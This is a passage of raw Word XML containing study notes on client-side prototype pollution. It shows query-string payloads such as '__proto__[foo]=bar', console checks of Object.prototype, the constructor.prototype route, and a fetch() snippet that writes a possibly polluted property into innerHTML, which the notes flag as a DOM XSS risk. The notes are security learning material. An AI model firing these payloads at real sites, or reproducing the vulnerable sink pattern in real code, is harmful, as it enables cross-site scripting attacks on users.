          <w:szCs w:val="16"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Finding prototype pollution sources manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6167E401" w14:textId="77777777" w:rsidR="00C0337A" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00C033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/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Try to inject an arbitrary property via the query string, URL fragment, and any web message data. </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A2F2FF" w14:textId="77777777" w:rsidR="00C0337A" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00C0337A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2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lastRenderedPageBreak/>
        <w:t>vulnerable-website.com/?</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>__proto__[foo]=bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B510B69" w14:textId="77777777" w:rsidR="00C0337A" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00C0337A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>In your browser console, inspect the </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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t>Object.prototype</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t> to see if you have successfully polluted it with your arbitrary property:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2F8EC3" w14:textId="77777777" w:rsidR="00C0337A" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00C0337A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:ind w:left="720"/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</w:pPr>
      <w:r w:rsidRPr="000477D2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t>Object.prototype.foo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E84C3F4" w14:textId="77777777" w:rsidR="00C0337A" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00C0337A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:ind w:left="720"/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</w:pPr>
      <w:r w:rsidRPr="000477D2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t>// "bar" indicates that you have successfully polluted the prototype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E3DD0" w14:textId="77777777" w:rsidR="00C0337A" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00C0337A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2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t>// undefined indicates that the attack was not successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687603B1" w14:textId="77777777" w:rsidR="00C0337A" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00C033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/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>If the property was not added to the global prototype, try using different techniques, such as switching to dot notation rather than bracket notation, or vice versa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127880CF" w14:textId="77777777" w:rsidR="00C0337A" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00C0337A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2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t>vulnerable-website.com/?</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>__proto__.foo=bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56013436" w14:textId="7D568707" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00424793">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Repeat this process for each potential source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348E183" w14:textId="5E004218" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00FF28A7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D71657" w14:textId="77777777" w:rsidR="00CB6C5C" w:rsidRPr="000477D2" w:rsidRDefault="00CB6C5C" w:rsidP="00CB6C5C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Prototype pollution via the constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF474F3" w14:textId="18C89433" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00CB6C5C" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> can create a new object either using literal syntax or by explicitly invoking the </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>Object()</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> constructor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EA23DE" w14:textId="77777777" w:rsidR="00CB6C5C" w:rsidRPr="000477D2" w:rsidRDefault="00CB6C5C" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4900EA1A" w14:textId="77777777" w:rsidR="00CB6C5C" w:rsidRPr="00CB6C5C" w:rsidRDefault="00CB6C5C" w:rsidP="00CB6C5C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CB6C5C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let myObjectLiteral = {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB6C5C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};</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2C62AFE8" w14:textId="4321C628" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00CB6C5C" w:rsidP="00CB6C5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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let myObject = new Object(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4D348A79" w14:textId="4155FF3A" w:rsidR="00CB6C5C" w:rsidRPr="00CB6C5C" w:rsidRDefault="00CB6C5C" w:rsidP="00CB6C5C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6C5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> can then reference the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6C5C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t>Object()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6C5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t> constructor via the built-in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6C5C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t>constructor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6C5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t> property:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3CF619" w14:textId="77777777" w:rsidR="00CB6C5C" w:rsidRPr="00CB6C5C" w:rsidRDefault="00CB6C5C" w:rsidP="00CB6C5C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CB6C5C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myObjectLiteral.constructor            </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6C5C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// function Object(){...}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514CB1C5" w14:textId="46B9D61A" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00CB6C5C" w:rsidP="00CB6C5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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myObject.constructor                   </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// function Object(){...}</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4944E382" w14:textId="5EC84958" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00CB6C5C" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Each constructor function has a </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>prototype</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> property, which points to the prototype that will be assigned to any objects</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B2A0DE" w14:textId="77777777" w:rsidR="00CB6C5C" w:rsidRPr="000477D2" w:rsidRDefault="00CB6C5C" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614634DA" w14:textId="77777777" w:rsidR="00CB6C5C" w:rsidRPr="00CB6C5C" w:rsidRDefault="00CB6C5C" w:rsidP="00CB6C5C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CB6C5C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myObject.constructor.prototype        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6C5C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// Object.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D66813C" w14:textId="77777777" w:rsidR="00CB6C5C" w:rsidRPr="00CB6C5C" w:rsidRDefault="00CB6C5C" w:rsidP="00CB6C5C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CB6C5C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myString.constructor.prototype        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6C5C">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// String.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B73BB8" w14:textId="4078C62B" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00CB6C5C" w:rsidP="00CB6C5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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myArray.constructor.prototype         </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// Array.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72515F0B" w14:textId="36B82E72" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52DA9238" w14:textId="6E265DE0" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00CB6C5C" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>myObject.constructor.prototype</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> is equivalent to </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>myObject.__proto__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762339AD" w14:textId="4068AA5E" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77FF9DDD" w14:textId="77777777" w:rsidR="00BA041C" w:rsidRPr="000477D2" w:rsidRDefault="00BA041C" w:rsidP="00BA041C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Prototype pollution via fetch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EC3A50" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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fetch('https://normal-website.com/my-account/change-email', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B85DCC3" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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method: 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39730C8B" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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body: 'user=carlos&amp;email=carlos%40ginandjuice.shop'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5CB031" w14:textId="0DB4F2F6" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00E24B43" w:rsidP="00E24B43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D2824" w14:textId="2B22B599" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D9D7F34" w14:textId="1F20A28F" w:rsidR="00CB6C5C" w:rsidRPr="000477D2" w:rsidRDefault="00E24B43" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>he following code is potentially vulnerable to DOM </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="000477D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>XSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> via prototype pollution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE727A7" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="000477D2" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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</w:p>
    <w:p w14:paraId="504E6B07" w14:textId="420903E4" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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fetch('/my-products.json',{method:"GET"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6CBC63" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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.then((response) =&gt; response.json())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458421CB" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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.then((data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79113E16" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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    let username = data['x-username'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E24B43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];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2587CDED" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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    let message = document.querySelector('.message'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E24B43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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65F3C15B" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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    if(username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534DAC1B" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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        message.innerHTML = `My products. Logged in as &lt;b&gt;${username}&lt;/b&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E24B43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`;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65D05ECC" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D1B3E5" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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    let productList = document.querySelector('ul.products'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E24B43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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="58EF0E5D" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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    for(let product of data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6606EC23" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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        let product = document.createElement('li'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
